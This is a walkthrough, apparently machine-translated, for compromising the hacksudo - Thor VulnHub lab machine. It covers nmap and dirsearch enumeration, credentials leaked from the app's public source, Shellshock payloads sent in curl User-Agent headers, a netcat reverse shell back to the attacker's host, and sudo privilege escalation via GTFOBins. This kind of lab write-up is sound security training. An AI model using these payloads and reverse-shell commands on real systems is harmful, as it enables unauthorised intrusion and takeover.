1、 Target information

Target name ：hacksudo - Thor

Target difficulty ： secondary

Virtual machine environment ： This target is recommended Virtualbox build

The goal is ： obtain root jurisdiction

Target address ：https://download.vulnhub.com/hacksudo/hacksudo---Thor.zip

2、 The host found

2.1 Use nmap Host discovery of the network segment where the target is located , adopt MAC Know the address , The target address is

192.168.2.175

nmap -sn 192.168.2.0/24

2.2 Full port scanning of the target address

nmap -p- 192.168.2.175

2.3 Version service scan

nmap -p 21,22,80 -sV 192.168.2.175

2.4 Yes 80 Port access , Found a login window

3、WEB Directory crawling

3.1 Direct directory scanning , Try to find sensitive information

dirsearch -u http://192.168.2.175 -e *

3.2 View the scanned directory , The first is to find a markdown file , Find the code author in the file github Address

192.168.2.175/README.md

https://github.com/zakee94/

3.3 Find one images Catalog , There is no useful information

http://192.168.2.175/images/

3.4 Also found another landing page , But there is no account secret at present , I don't care

http://192.168.2.175/index.php/login/

4、 Open source code leakage

4.1 Try accessing the source code publishing address found above , See if there is any sensitive information exposed https://github.com/zakee94/

4.2 visit https://github.com/zakee94/online-banking-system

The account number obtained is ：admin, The password is ：password123

4.3 Try to 80 Login on the port page , Prompt invalid authentication

4.4 In the code file , We found a admin_login.php The catalog of

4.5 Try to access this administrator directory , And log in with the above account secret , Found that you can successfully log in

http://192.168.2.175/admin_login.php

4.6 After login, you can perform account management and other operations

5、 Broken shell

5.1 see news.php Source code , One of them cgi-bin, Use... In the front web When the directory is found , Also sweep out cgi-bin Catalog , This requires our attention , There may be a shell breaking vulnerability

5.2 Use dirsearch Yes /cgi-bin Crawl this directory , look for cgi and sh Table of contents at the end , Here we found two directories /cgi-bin/backup.cgi and /cgi-bin/shell.sh

dirsearch -u http://192.168.2.175/cgi-bin/ -f -e cgi,sh

5.3 Use nmap Script for shell breaking vulnerability detection , Find out backup.cgi There are shell breaking holes

nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 192.168.2.175

5.4 Use nmap Script for shell breaking vulnerability detection , Find out shell.sh There are also shell breaking holes

nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh,cmd=ls 192.168.2.175

5.5 Use curl command , stay ua Add shell breaking holes in the header payload, You can see the successful echo

curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'id'" \http://192.168.2.175/cgi-bin/backup.cgi

5.6 Go further to check whether the target aircraft exists nc command , Discovery is there , It means we can rebound directly shell

curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'which nc'" \http://192.168.2.175/cgi-bin/backup.cgi

5.7 First, in the kali Listening port , And then in kali Input bounce shell Of payload, Take advantage of the broken shell to get shell

curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'nc -e /bin/bash 192.168.2.172 9999'" \http://192.168.2.175/cgi-bin/backup.cgi

5.8 Successfully get shell, The user name is called www-data, The next step is to raise the right

nc -nvlp 9999

5.9 Use python Upgrade to interactive shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

6、GTFOBins Raise the right

6.1 View the current user sudo jurisdiction , Find one that doesn't need a password to thor Script executed with permission

6.2 Use thor Execute script with user rights , This script will first ask us to enter thor The key of , We can enter any value here , After we return the car for confirmation , Will then ask us to enter secret messages , Here we enter a command id, Found that the command was executed successfully , Remind us that the user is a thor Users of

sudo -u thor /home/thor/./hammer.sh

6.3 Use the script to raise the right to thor user , We are at the secret information office (Secret massage), Input bash, Successfully raised the right to thor user

6.4 see thor User sudo jurisdiction , It is found that you can use root privilege use cat command , And the use of root Permission to run service command , Here you can directly use service It's up to root. Some commands are incorrectly configured 、 The configuration was not then , You can find ways to raise rights through this website ：GTFOBins

sudo service ../../bin/bash